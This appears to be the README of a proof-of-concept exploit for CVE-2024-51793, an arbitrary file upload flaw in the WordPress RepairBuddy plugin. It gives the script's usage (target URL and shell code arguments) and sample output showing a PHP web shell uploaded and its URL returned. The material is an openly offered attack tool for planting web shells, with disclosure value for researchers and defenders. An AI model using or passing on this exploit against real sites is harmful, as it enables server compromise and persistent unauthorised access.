
WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability
CVE-ID: CVE-2024-51793
Published: 2024-11-11
Updated: 2024-11-11
Title: WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability
Description:
Unrestricted Upload of File with Dangerous Type vulnerability in Webful Creations Computer Repair Shop allows Upload a Web Shell to a Web Server. This issue affects Computer Repair Shop: from n/a through 3.8115.
CWE:
CVSS:
This is a proof of concept exploit for the Arbitrary File Upload vulnerability in the WordPress RepairBuddy plugin versions <= 3.8115. The exploit allows an attacker to upload a web shell to the vulnerable server.
requests library (pip install requests)usage:
CVE-2024-51793.py [-h] -u URL [-shell SHELL]
WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability # By Nxploited ,Khaled alenazi.
options:
-h, --help show this help message and exit
-u, --url URL Target URL
-shell SHELL Shell code to upload
python
CVE-2024-51793.py -u http://target.com/wordpress
Exploit By : Nxploit Khaled Alenazi,
🎯 The site is vulnerable. Proceeding with the exploit...
Response: "<a href=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" target=\"_blank\"><\/a><input type=\"hidden\" name=\"repairBuddAttachment_file[]\" value=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" \/>"
✅ Shell uploaded successfully.
🔗 Shell URL: http://target/wordpress/wp-content/repairbuddy_uploads/reciepts/2025_03_23_22_43_50nxploit.php
Exploit By: Nxploited, Khaled Alenazi